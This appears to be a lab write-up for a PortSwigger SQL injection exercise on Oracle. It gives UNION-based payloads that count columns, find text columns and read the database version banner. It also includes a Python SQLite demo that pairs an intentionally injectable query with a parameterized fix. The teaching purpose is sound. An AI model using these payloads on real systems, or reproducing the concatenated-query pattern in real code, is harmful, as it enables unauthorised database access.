Lab: SQL injection attack, querying the database type and version on Oracle

tags: Portswigger Web Security Academy Web
  • Description: This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
  • Our Goal: To solve the lab, display the database version string.

Exp - SQLi Cheat Sheet - Examining the database in SQL injection attacks

According to the cheat sheet above, there is a query we can use to fetch the version of this database. Warning: before the recon, the hint told you that this database is created by Oracle, so every query must contain a FROM clause (FROM is a reserved word Oracle requires), e.g. SELECT 'abc' FROM dual.

  1. Determine the number of columns returned by the query. Payload: ?category=Gifts' union select NULL,NULL from v$version--

  2. Determine which columns contain text data. Payload: ?category=Gifts' union select 'a','b' from v$version-- Both columns hold text data.

  3. Attack. Payload: ?category=Gifts' UNION SELECT BANNER,'abc' FROM v$version--
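The root cause the three steps exploit is that the category filter splices the parameter value straight into the SQL text. The following is an added example, not code from the lab or from PortSwigger: it uses an in-memory SQLite database as a stand-in for Oracle (sqlite_version() replaces v$version.BANNER, and SQLite needs no FROM dual), builds the filter both ways, and shows the same UNION payload shape returning the version string against the concatenated query while a bind parameter simply matches no products. The table name, rows and payload are constructed for the example.

```python
import sqlite3

# Constructed sample data standing in for the lab's product table
# (assumption: the lab's real schema is not shown on the page).
PRODUCTS = [
    ("Gift Card", "Gifts"),
    ("Mug", "Gifts"),
    ("Headphones", "Tech"),
]
REAL_CATEGORIES = {"Gifts", "Tech"}

# Same shape as the lab's step-3 payload, adapted to SQLite: two columns so the
# UNION lines up with the original SELECT, and "--" comments out the closing quote.
PAYLOAD = "Gifts' UNION SELECT sqlite_version(), 'abc'--"


def make_db():
    """Create a fresh in-memory database holding the constructed products."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return conn


def filter_vulnerable(conn, category):
    """String concatenation: the attacker's text becomes part of the query."""
    sql = f"SELECT name, category FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def filter_hardened(conn, category):
    """Bind parameter: the value is data only and cannot alter query structure."""
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def injected_rows(rows):
    """Rows whose category is not a real one came from the UNIONed query."""
    return [r for r in rows if r[1] not in REAL_CATEGORIES]


if __name__ == "__main__":
    db = make_db()
    leaked = injected_rows(filter_vulnerable(db, PAYLOAD))
    print("vulnerable filter leaked:", leaked)        # version string, 'abc'
    print("hardened filter returned:", filter_hardened(db, PAYLOAD))  # []
```

The hardened version returns an empty list because no product has the literal category "Gifts' UNION SELECT ...", which is exactly the behaviour a defender wants: the database never sees a second SELECT.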

Reference